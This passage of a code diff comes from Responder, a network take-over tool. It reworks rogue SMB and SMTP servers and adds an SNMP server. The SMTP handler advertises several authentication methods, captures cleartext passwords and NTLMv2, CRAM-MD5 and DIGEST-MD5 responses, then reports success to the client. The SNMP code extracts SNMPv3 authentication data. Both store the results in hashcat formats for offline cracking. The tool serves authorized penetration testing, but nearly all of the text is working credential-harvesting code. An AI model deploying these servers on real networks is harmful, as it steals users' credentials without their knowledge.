-					Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-
-				if data[8:10] == "\x25\x00" and data[4:5] == "\xff":  # Trans2 Access Denied.
-					Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-				
-
-				if data[8:10] == "\x74\x00" and data[4:5] == "\xff":  # LogOff
-					Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x02\xff\x00\x27\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-
 		except:
 			pass
 
@@ -399,35 +336,39 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 class SMB1LM(BaseRequestHandler):  # SMB Server class, old version
 	def handle(self):
 		try:
-			self.request.settimeout(0.5)
+			self.request.settimeout(1)
 			data = self.request.recv(1024)
-                        Challenge = RandomChallenge()
-			if data[0] == "\x81":  #session request 139
+			Challenge = RandomChallenge()
+			if data[0:1] == b"\x81":  #session request 139
 				Buffer = "\x82\x00\x00\x00"
-				self.request.send(Buffer)
+				self.request.send(NetworkSendBufferPython2or3(Buffer))
 				data = self.request.recv(1024)
 
-			if data[8:10] == "\x72\x00":  #Negotiate proto answer.
-				head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
-				Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=Challenge)
+			if data[8:10] == b"\x72\x00":  #Negotiate proto answer.
+				head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
+				Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)),Domain="",Key=NetworkRecvBufferPython2or3(Challenge))
 				Body.calculate()
 				Packet = str(head)+str(Body)
-				Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-				self.request.send(Buffer)
+				Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
+				self.request.send(NetworkSendBufferPython2or3(Buffer))
 				data = self.request.recv(1024)
 
-			if data[8:10] == "\x73\x00":  #Session Setup AndX Request
+			if data[8:10] == b"\x73\x00":  #Session Setup AndX Request
 				if Is_LMNT_Anonymous(data):
-					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					Packet = str(head)+str(SMBSessEmpty())
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					self.request.send(Buffer)
+					Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 				else:
 					ParseLMNTHash(data,self.client_address[0], Challenge)
-					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					if settings.Config.ErrorCode:
+						ntstatus="\x6d\x00\x00\xc0"
+					else:
+						ntstatus="\x22\x00\x00\xc0"
+					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode=ntstatus,pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					Packet = str(head) + str(SMBSessEmpty())
-					Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
-					self.request.send(Buffer)
+					Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
 		except Exception:
 			self.request.close()

servers/SMTP.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
+# email: lgaffie@secorizon.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
@@ -15,48 +15,632 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from utils import *
-from base64 import b64decode
-from SocketServer import BaseRequestHandler
+from base64 import b64decode, b64encode
+import hashlib
+import codecs
+import struct
+import re
+import ssl
+import os
+
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2
 
 class ESMTP(BaseRequestHandler):
-
+	"""SMTP server with multiple authentication methods and STARTTLS"""
+	
+	def __init__(self, *args, **kwargs):
+		self.challenge = None
+		BaseRequestHandler.__init__(self, *args, **kwargs)
+	
+	def send_response(self, code, message):
+		"""Send SMTP response"""
+		response = "%d %s\r\n" % (code, message)
+		self.request.send(response.encode('latin-1'))
+	
+	def send_multiline_response(self, code, lines):
+		"""Send multi-line SMTP response"""
+		for i, line in enumerate(lines):
+			if i < len(lines) - 1:
+				response = "%d-%s\r\n" % (code, line)
+			else:
+				response = "%d %s\r\n" % (code, line)
+			self.request.send(response.encode('latin-1'))
+	
+	def send_continue(self, data=""):
+		"""Send continuation response for AUTH"""
+		if data:
+			response = "334 %s\r\n" % data
+		else:
+			response = "334\r\n"
+		self.request.send(response.encode('latin-1'))
+	
+	def upgrade_to_tls(self):
+		"""Upgrade connection to TLS using Responder's SSL certificates"""
+		try:
+			# Get SSL certificate paths from Responder config
+			cert_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+			key_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+			
+			if not os.path.exists(cert_path) or not os.path.exists(key_path):
+				if settings.Config.Verbose:
+					print(text('[SMTP] SSL certificates not found'))
+				return False
+			
+			# Create SSL context
+			context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+			context.load_cert_chain(cert_path, key_path)
+			
+			# Wrap socket
+			self.request = context.wrap_socket(self.request, server_side=True)
+			
+			if settings.Config.Verbose:
+				print(text('[SMTP] Successfully upgraded to TLS from %s' % 
+					self.client_address[0].replace("::ffff:", "")))
+			
+			return True
+			
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] TLS upgrade failed: %s' % str(e)))
+			return False
+	
+	def handle_auth_plain(self, data):
+		"""Handle AUTH PLAIN"""
+		try:
+			# AUTH PLAIN can be:
+			# AUTH PLAIN <base64>
+			# or
+			# AUTH PLAIN
+			# <base64>
+			
+			auth_match = re.search(b'AUTH PLAIN (.+)', data, re.IGNORECASE)
+			
+			if auth_match:
+				# Inline format
+				auth_data = auth_match.group(1).strip()
+			else:
+				# Need to read next line
+				self.send_continue()
+				auth_data = self.request.recv(1024).strip()
+			
+			if not auth_data or auth_data == b'*':
+				return False
+			
+			# Decode
+			decoded = b64decode(auth_data)
+			# Format: [authzid]\x00username\x00password
+			parts = decoded.split(b'\x00')
+			
+			if len(parts) >= 3:
+				username = parts[1].decode('latin-1', errors='ignore')
+				password = parts[2].decode('latin-1', errors='ignore')
+			elif len(parts) == 2:
+				username = parts[0].decode('latin-1', errors='ignore')
+				password = parts[1].decode('latin-1', errors='ignore')
+			else:
+				return False
+			
+			SaveToDb({
+				'module': 'SMTP',
+				'type': 'AUTH-PLAIN',
+				'client': self.client_address[0],
+				'user': username,
+				'cleartext': password,
+				'fullhash': username + ":" + password,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [SMTP] Captured AUTH PLAIN credentials from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 2, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] Error parsing AUTH PLAIN: %s' % str(e)))
+			return False
+	
+	def handle_auth_login(self, data):
+		"""Handle AUTH LOGIN (two-stage)"""
+		try:
+			# Check if username is inline
+			auth_match = re.search(b'AUTH LOGIN (.+)', data, re.IGNORECASE)
+			
+			if auth_match:
+				# Username provided inline
+				username_b64 = auth_match.group(1).strip()
+				username = b64decode(username_b64).decode('latin-1', errors='ignore')
+			else:
+				# Prompt for username
+				self.send_continue(b64encode(b"Username:").decode('latin-1'))
+				username_b64 = self.request.recv(1024).strip()
+				
+				if not username_b64 or username_b64 == b'*':
+					return False
+				
+				username = b64decode(username_b64).decode('latin-1', errors='ignore')
+			
+			# Prompt for password
+			self.send_continue(b64encode(b"Password:").decode('latin-1'))
+			password_b64 = self.request.recv(1024).strip()
+			
+			if not password_b64 or password_b64 == b'*':
+				return False
+			
+			password = b64decode(password_b64).decode('latin-1', errors='ignore')
+			
+			SaveToDb({
+				'module': 'SMTP',
+				'type': 'AUTH-LOGIN',
+				'client': self.client_address[0],
+				'user': username,
+				'cleartext': password,
+				'fullhash': username + ":" + password,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [SMTP] Captured AUTH LOGIN credentials from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 2, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] Error parsing AUTH LOGIN: %s' % str(e)))
+			return False
+	
+	def handle_auth_cram_md5(self, data):
+		"""Handle AUTH CRAM-MD5 (challenge-response)"""
+		try:
+			import time
+			import os
+			
+			# Generate challenge
+			challenge = "<%d.%d@%s>" % (os.getpid(), int(time.time()), settings.Config.MachineName)
+			challenge_b64 = b64encode(challenge.encode('latin-1')).decode('latin-1')
+			
+			# Send challenge
+			self.send_continue(challenge_b64)
+			
+			# Receive response
+			response_b64 = self.request.recv(1024).strip()
+			
+			if not response_b64 or response_b64 == b'*':
+				return False
+			
+			response = b64decode(response_b64).decode('latin-1', errors='ignore')
+			# Format: username<space>digest
+			parts = response.split(' ', 1)
+			
+			if len(parts) < 2:
+				return False
+			
+			username = parts[0]
+			digest = parts[1].lower()
+			
+			# Format for hashcat
+			hash_string = "%s:$cram_md5$%s$%s" % (username, challenge, digest)
+			
+			SaveToDb({
+				'module': 'SMTP',
+				'type': 'CRAM-MD5',
+				'client': self.client_address[0],
+				'user': username,
+				'hash': digest,
+				'fullhash': hash_string,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [SMTP] Captured CRAM-MD5 hash from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 3, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] Error parsing CRAM-MD5: %s' % str(e)))
+			return False
+	
+	def handle_auth_digest_md5(self, data):
+		"""Handle AUTH DIGEST-MD5"""
+		try:
+			import time
+			import os
+			
+			# Generate nonce
+			nonce = hashlib.md5(str(time.time()).encode()).hexdigest()
+			
+			# Build challenge
+			challenge_parts = [
+				'realm="%s"' % settings.Config.MachineName,
+				'nonce="%s"' % nonce,
+				'qop="auth"',
+				'charset=utf-8',
+				'algorithm=md5-sess'
+			]
+			challenge = ','.join(challenge_parts)
+			challenge_b64 = b64encode(challenge.encode('latin-1')).decode('latin-1')
+			
+			# Send challenge
+			self.send_continue(challenge_b64)
+			
+			# Receive response
+			response_b64 = self.request.recv(1024).strip()
+			
+			if not response_b64 or response_b64 == b'*':
+				return False
+			
+			response = b64decode(response_b64).decode('latin-1', errors='ignore')
+			
+			# Parse response
+			username_match = re.search(r'username="([^"]+)"', response)
+			realm_match = re.search(r'realm="([^"]+)"', response)
+			nonce_match = re.search(r'nonce="([^"]+)"', response)
+			cnonce_match = re.search(r'cnonce="([^"]+)"', response)
+			nc_match = re.search(r'nc=([0-9a-fA-F]+)', response)
+			qop_match = re.search(r'qop=([a-z\-]+)', response)
+			uri_match = re.search(r'digest-uri="([^"]+)"', response)
+			response_match = re.search(r'response=([0-9a-fA-F]+)', response)
+			
+			if not username_match or not response_match:
+				return False
+			
+			username = username_match.group(1)
+			realm = realm_match.group(1) if realm_match else ''
+			resp_nonce = nonce_match.group(1) if nonce_match else ''
+			cnonce = cnonce_match.group(1) if cnonce_match else ''
+			nc = nc_match.group(1) if nc_match else ''
+			qop = qop_match.group(1) if qop_match else ''
+			uri = uri_match.group(1) if uri_match else ''
+			resp_hash = response_match.group(1)
+			
+			# Format for hashcat/john
+			hash_string = "%s:$sasl$DIGEST-MD5$%s$%s$%s$%s$%s$%s$%s" % (
+				username, realm, nonce, cnonce, nc, qop, uri, resp_hash
+			)
+			
+			SaveToDb({
+				'module': 'SMTP',
+				'type': 'DIGEST-MD5',
+				'client': self.client_address[0],
+				'user': username,
+				'hash': resp_hash,
+				'fullhash': hash_string,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [SMTP] Captured DIGEST-MD5 hash from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 3, 1))
+			
+			# Send rspauth (expected by some clients)
+			rspauth = 'rspauth=' + resp_hash
+			self.send_continue(b64encode(rspauth.encode('latin-1')).decode('latin-1'))
+			
+			# Client should send empty line
+			self.request.recv(1024)
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] Error parsing DIGEST-MD5: %s' % str(e)))
+			return False
+	
+	def handle_auth_ntlm(self, data):
+		"""Handle AUTH NTLM with proper Type 2 challenge"""
+		try:
+			import time
+			
+			# Check for inline NTLM NEGOTIATE
+			auth_match = re.search(b'AUTH NTLM (.+)', data, re.IGNORECASE)
+			
+			if auth_match:
+				negotiate_b64 = auth_match.group(1).strip()
+			else:
+				# Send empty continuation
+				self.send_continue()
+				negotiate_b64 = self.request.recv(1024).strip()
+			
+			if not negotiate_b64 or negotiate_b64 == b'*':
+				return False
+			
+			negotiate = b64decode(negotiate_b64)
+			
+			# Verify NTLMSSP signature
+			if negotiate[0:8] != b'NTLMSSP\x00':
+				return False
+			
+			msg_type = struct.unpack('<I', negotiate[8:12])[0]
+			if msg_type != 1:  # Type 1 - NEGOTIATE
+				return False
+			
+			# Generate Type 2 with proper structure
+			type2_msg = self.generate_ntlm_type2()
+			challenge_b64 = b64encode(type2_msg).decode('latin-1')
+			
+			# Send challenge
+			self.send_continue(challenge_b64)
+			
+			# Receive NTLMSSP AUTH (Type 3)
+			auth_b64 = self.request.recv(2048).strip()
+			
+			if not auth_b64 or auth_b64 == b'*':
+				return False
+			
+			auth_data = b64decode(auth_b64)
+			
+			# Parse Type 3 and extract hash
+			ntlm_hash = self.parse_ntlm_type3(auth_data, type2_msg)
+			
+			if ntlm_hash:
+				# Extract username from hash for logging
+				username = ntlm_hash.split('::')[0]
+				
+				SaveToDb({
+					'module': 'SMTP',
+					'type': 'NTLMv2-SSP',
+					'client': self.client_address[0],
+					'user': username,
+					'hash': ntlm_hash,
+					'fullhash': ntlm_hash,
+				})
+				
+				if settings.Config.Verbose:
+					print(color("[*] [SMTP] Captured NTLMv2 hash from %s for user %s" % (
+						self.client_address[0].replace("::ffff:", ""), username), 3, 1))
+				
+				return True
+			
+			return False
+			
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] Error parsing NTLM: %s' % str(e)))
+			return False
+	
+	def generate_ntlm_type2(self):
+		"""Generate NTLM Type 2 with target info for NTLMv2"""
+		import time
+		
+		# Generate random 8-byte challenge
+		challenge = RandomChallenge()
+		
+		# Target name: "WORKGROUP" (18 bytes in UTF-16LE)
+		target_name = b'WORKGROUP'.decode('ascii').encode('utf-16le')
+		target_name_len = len(target_name)
+		
+		# Build target info (AV pairs) for NTLMv2
+		target_info = b''
+		
+		# MsvAvNbDomainName (0x0002)
+		av_domain = b'WORKGROUP'.decode('ascii').encode('utf-16le')
+		target_info += struct.pack('<HH', 0x0002, len(av_domain)) + av_domain
+		
+		# MsvAvNbComputerName (0x0001)
+		av_computer = b'SERVER'.decode('ascii').encode('utf-16le')
+		target_info += struct.pack('<HH', 0x0001, len(av_computer)) + av_computer
+		
+		# MsvAvDnsDomainName (0x0004)
+		av_dns_domain = b'workgroup'.decode('ascii').encode('utf-16le')
+		target_info += struct.pack('<HH', 0x0004, len(av_dns_domain)) + av_dns_domain
+		
+		# MsvAvDnsComputerName (0x0003)
+		av_dns_computer = b'server'.decode('ascii').encode('utf-16le')
+		target_info += struct.pack('<HH', 0x0003, len(av_dns_computer)) + av_dns_computer
+		
+		# MsvAvTimestamp (0x0007) - 8 bytes FILETIME
+		filetime = int((time.time() + 11644473600) * 10000000)
+		target_info += struct.pack('<HH', 0x0007, 8) + struct.pack('<Q', filetime)
+		
+		# MsvAvEOL (0x0000)
+		target_info += struct.pack('<HH', 0x0000, 0)
+		
+		target_info_len = len(target_info)
+		
+		# Calculate offsets
+		target_name_offset = 48
+		target_info_offset = target_name_offset + target_name_len
+		
+		# Build Type 2 message
+		type2_msg = b'NTLMSSP\x00'  # Signature
+		type2_msg += struct.pack('<I', 2)  # Type 2
+		
+		# Target name (LE format: len, max len, offset)
+		type2_msg += struct.pack('<HHI', target_name_len, target_name_len, target_name_offset)
+		
+		# Flags - use HTTP server flags for compatibility
+		type2_msg += b'\x05\x02\x81\xa2'  # 0xa2810205
+		
+		# Challenge (8 bytes)
+		type2_msg += challenge
+		
+		# Context (8 bytes, reserved)
+		type2_msg += b'\x00' * 8
+		
+		# Target info (LE format: len, max len, offset)
+		type2_msg += struct.pack('<HHI', target_info_len, target_info_len, target_info_offset)
+		
+		# Payload
+		type2_msg += target_name
+		type2_msg += target_info
+		
+		return type2_msg
+	
+	def parse_ntlm_type3(self, type3_msg, type2_msg):
+		"""Parse Type 3 and extract NetNTLMv2 hash"""
+		try:
+			# Verify signature
+			if type3_msg[:8] != b'NTLMSSP\x00':
+				return None
+			
+			# Verify message type
+			msg_type = struct.unpack('<I', type3_msg[8:12])[0]
+			if msg_type != 3:
+				return None
+			
+			# Parse security buffers
+			# LM Response
+			lm_len, lm_maxlen, lm_offset = struct.unpack('<HHI', type3_msg[12:20])
+			
+			# NTLM Response
+			ntlm_len, ntlm_maxlen, ntlm_offset = struct.unpack('<HHI', type3_msg[20:28])
+			
+			# Domain name
+			domain_len, domain_maxlen, domain_offset = struct.unpack('<HHI', type3_msg[28:36])
+			
+			# User name
+			user_len, user_maxlen, user_offset = struct.unpack('<HHI', type3_msg[36:44])
+			
+			# Workstation name
+			ws_len, ws_maxlen, ws_offset = struct.unpack('<HHI', type3_msg[44:52])
+			
+			# Extract strings
+			if user_offset + user_len <= len(type3_msg):
+				user = type3_msg[user_offset:user_offset+user_len].decode('utf-16le', errors='ignore')
+			else:
+				user = ""
+			
+			if domain_offset + domain_len <= len(type3_msg):
+				domain = type3_msg[domain_offset:domain_offset+domain_len].decode('utf-16le', errors='ignore')
+			else:
+				domain = ""
+			
+			# DO NOT parse email addresses - use exact Type 3 fields for hashcat
+			
+			if ws_offset + ws_len <= len(type3_msg):
+				workstation = type3_msg[ws_offset:ws_offset+ws_len].decode('utf-16le', errors='ignore')
+			else:
+				workstation = ""
+			
+			# Extract NTLM response
+			if ntlm_offset + ntlm_len <= len(type3_msg):
+				ntlm_response = type3_msg[ntlm_offset:ntlm_offset+ntlm_len]
+			else:
+				return None
+			
+			# Check if NTLMv2 (response length > 24 bytes)
+			if len(ntlm_response) > 24:
+				# NTLMv2
+				ntlmv2_response = ntlm_response[:16]  # First 16 bytes
+				ntlmv2_blob = ntlm_response[16:]      # Rest is the blob
+				
+				# Extract challenge from Type 2
+				challenge = type2_msg[24:32]  # Challenge is at offset 24
+				
+				# Build hashcat NetNTLMv2 format
+				# Format: username::domain:challenge:ntlmv2_response:blob
+				# For hashcat mode 5600
+				hash_str = "%s::%s:%s:%s:%s" % (
+					user,
+					domain,
+					codecs.encode(challenge, 'hex').decode('latin-1'),
+					codecs.encode(ntlmv2_response, 'hex').decode('latin-1'),
+					codecs.encode(ntlmv2_blob, 'hex').decode('latin-1')
+				)
+				
+				return hash_str
+			
+			# NTLMv1 or unsupported
+			return None
+			
+		except Exception as e:
+			return None
+	
 	def handle(self):
 		try:
-			self.request.send(str(SMTPGreeting()))
+			# Send greeting
+			self.request.send(NetworkSendBufferPython2or3(SMTPGreeting()))
 			data = self.request.recv(1024)
-
-			if data[0:4] == "EHLO":
-				self.request.send(str(SMTPAUTH()))
-				data = self.request.recv(1024)
-
-			if data[0:4] == "AUTH":
-				self.request.send(str(SMTPAUTH1()))
+			
+			# Handle EHLO
+			if data[0:4].upper() == b'EHLO' or data[0:4].upper() == b'HELO':
+				# Send ESMTP capabilities
+				capabilities = [
+					settings.Config.MachineName + " Hello",
+					"STARTTLS",
+					"AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 NTLM",
+					"SIZE 35651584",
+					"8BITMIME",
+					"PIPELINING",
+					"ENHANCEDSTATUSCODES"
+				]
+				self.send_multiline_response(250, capabilities)
 				data = self.request.recv(1024)
+			
+			# Handle STARTTLS command
+			if data[0:8].upper() == b'STARTTLS':
+				self.send_response(220, "Ready to start TLS")
 				
-				if data:
-					try:
-						User = filter(None, b64decode(data).split('\x00'))
-						Username = User[0]
-						Password = User[1]
-					except:
-						Username = b64decode(data)
-
-						self.request.send(str(SMTPAUTH2()))
+				# Upgrade to TLS
+				if self.upgrade_to_tls():
+					# After successful TLS upgrade, client will send EHLO again
+					data = self.request.recv(1024)
+					
+					# Handle EHLO after STARTTLS
+					if data[0:4].upper() == b'EHLO' or data[0:4].upper() == b'HELO':
+						# Send capabilities again (without STARTTLS this time)
+						capabilities = [
+							settings.Config.MachineName + " Hello",
+							"AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 NTLM",
+							"SIZE 35651584",
+							"8BITMIME",
+							"PIPELINING",
+							"ENHANCEDSTATUSCODES"
+						]
+						self.send_multiline_response(250, capabilities)
 						data = self.request.recv(1024)
-
-						if data:
-							try: Password = b64decode(data)
-							except: Password = data
-
-					SaveToDb({
-						'module': 'SMTP', 
-						'type': 'Cleartext', 
-						'client': self.client_address[0], 
-						'user': Username, 
-						'cleartext': Password, 
-						'fullhash': Username+":"+Password,
-					})
-
-		except Exception:
+				else:
+					# TLS upgrade failed
+					self.send_response(454, "TLS not available")
+					return
+			
+			# Handle AUTH command
+			if data[0:4].upper() == b'AUTH':
+				mechanism = data[5:].strip().split(b' ')[0].upper()
+				
+				if mechanism == b'PLAIN':
+					if self.handle_auth_plain(data):
+						self.send_response(235, "Authentication successful")
+					else:
+						self.send_response(535, "Authentication failed")
+					return
+				
+				elif mechanism == b'LOGIN':
+					if self.handle_auth_login(data):
+						self.send_response(235, "Authentication successful")
+					else:
+						self.send_response(535, "Authentication failed")
+					return
+				
+				elif mechanism == b'CRAM-MD5' or mechanism.startswith(b'CRAM'):
+					if self.handle_auth_cram_md5(data):
+						self.send_response(235, "Authentication successful")
+					else:
+						self.send_response(535, "Authentication failed")
+					return
+				
+				elif mechanism == b'DIGEST-MD5' or mechanism.startswith(b'DIGEST'):
+					if self.handle_auth_digest_md5(data):
+						self.send_response(235, "Authentication successful")
+					else:
+						self.send_response(535, "Authentication failed")
+					return
+				
+				elif mechanism == b'NTLM':
+					if self.handle_auth_ntlm(data):
+						self.send_response(235, "Authentication successful")
+					else:
+						self.send_response(535, "Authentication failed")
+					return
+				
+				else:
+					self.send_response(504, "Unrecognized authentication type")
+					return
+			
+			# Handle other commands
+			self.send_response(250, "OK")
+			
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] Exception: %s' % str(e)))
 			pass

servers/SNMP.py

@@ -0,0 +1,391 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: lgaffie@secorizon.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+from binascii import hexlify, unhexlify
+import struct
+
+try:
+    from pyasn1.codec.ber.decoder import decode
+    from pyasn1.codec.ber.encoder import encode
+    HAS_PYASN1 = True
+except ImportError:
+    HAS_PYASN1 = False
+    if settings.Config.Verbose:
+        print(text('[SNMP] Warning: pyasn1 not installed, SNMP server disabled'))
+
+if settings.Config.PY2OR3 == "PY3":
+    from socketserver import BaseRequestHandler
+else:
+    from SocketServer import BaseRequestHandler
+
+# SNMPv3 Authentication Algorithms
+SNMPV3_AUTH_ALGORITHMS = {
+    b'\x06\x0c\x2b\x06\x01\x06\x03\x0f\x01\x01\x04\x00': ('usmNoAuthProtocol', None),
+    b'\x06\x0a\x2b\x06\x01\x06\x03\x0a\x01\x01\x02': ('usmHMACMD5AuthProtocol', 25100),
+    b'\x06\x0a\x2b\x06\x01\x06\x03\x0a\x01\x01\x03': ('usmHMACSHAAuthProtocol', 25200),
+    b'\x06\x09\x2b\x06\x01\x06\x03\x0a\x01\x01\x04': ('usmHMAC128SHA224AuthProtocol', 25300),
+    b'\x06\x09\x2b\x06\x01\x06\x03\x0a\x01\x01\x05': ('usmHMAC192SHA256AuthProtocol', 25400),
+    b'\x06\x09\x2b\x06\x01\x06\x03\x0a\x01\x01\x06': ('usmHMAC256SHA384AuthProtocol', 25500),
+    b'\x06\x09\x2b\x06\x01\x06\x03\x0a\x01\x01\x07': ('usmHMAC384SHA512AuthProtocol', 25600),
+}
+
+class SNMP(BaseRequestHandler):
+    def handle(self):
+        if not HAS_PYASN1:
+            return
+        
+        try:
+            data = self.request[0]
+            socket = self.request[1]
+            
+            # Decode the SNMP message
+            try:
+                received_record, rest_of_substrate = decode(data)
+            except Exception as e:
+                if settings.Config.Verbose:
+                    print(text('[SNMP] ASN.1 decode error: %s' % str(e)))
+                return
+            
+            # Get SNMP version
+            try:
+                snmp_version = int(received_record['field-0'])
+            except:
+                if settings.Config.Verbose:
+                    print(text('[SNMP] Could not determine SNMP version'))
+                return
+            
+            # Handle SNMPv3
+            if snmp_version == 3:
+                self.handle_snmpv3(data, received_record, socket)
+            # Handle SNMPv1/v2c
+            else:
+                self.handle_snmpv1v2c(data, received_record, snmp_version, socket)
+        
+        except Exception as e:
+            if settings.Config.Verbose:
+                print(text('[SNMP] Exception in handler: %s' % str(e)))
+            pass
+    
+    def handle_snmpv3(self, data, received_record, socket):
+        """Handle SNMPv3 messages and extract authentication parameters"""
+        try:
+            # Decode the inner security parameters
+            received_record_inner, _ = decode(received_record['field-2'])
+            
+            # Extract fields
+            snmp_user = str(received_record_inner['field-3'])
+            engine_id = hexlify(received_record_inner['field-0']._value).decode('utf-8')
+            engine_boots = int(received_record_inner['field-1'])
+            engine_time = int(received_record_inner['field-2'])
+            auth_params = hexlify(received_record_inner['field-4']._value).decode('utf-8')
+            priv_params = hexlify(received_record_inner['field-5']._value).decode('utf-8')
+            
+            # Zero out authentication parameters in packet for hashcat
+            # Hashcat recalculates HMAC over packet with auth params = zeros
+            data_hex = hexlify(data).decode('utf-8')
+            if auth_params and auth_params != '00' * 12:
+                # Replace auth params with zeros in the packet
+                zeroed_auth = '00' * (len(auth_params) // 2)
+                full_snmp_msg = data_hex.replace(auth_params, zeroed_auth)
+            else:
+                full_snmp_msg = data_hex
+            
+            # Determine authentication algorithm
+            auth_algo_name, hashcat_mode = self.identify_auth_algorithm(data)
+            
+            # If not detected by OID, infer from auth params length
+            if not hashcat_mode and auth_params and auth_params != '00' * 12:
+                auth_len = len(auth_params) // 2  # Convert hex to bytes
+                if auth_len == 12:
+                    # Could be MD5 or SHA1 - use combined mode
+                    auth_algo_name = 'HMAC-MD5-96/HMAC-SHA1-96'
+                    hashcat_mode = 25000
+                elif auth_len == 16:
+                    auth_algo_name = 'HMAC-SHA224'
+                    hashcat_mode = 25300
+                elif auth_len == 24:
+                    auth_algo_name = 'HMAC-SHA256'
+                    hashcat_mode = 25400
+                elif auth_len == 32:
+                    auth_algo_name = 'HMAC-SHA384'
+                    hashcat_mode = 25500
+                elif auth_len == 48:
+                    auth_algo_name = 'HMAC-SHA512'
+                    hashcat_mode = 25600
+            
+            # Check if this is a discovery request (no auth params and empty username)
+            if (not auth_params or auth_params == '00' * 12) and (not snmp_user or snmp_user == ''):
+                # Send discovery response with our engine ID
+                self.send_discovery_response(socket, received_record)
+                return
+            
+            # Check if authentication is actually being used
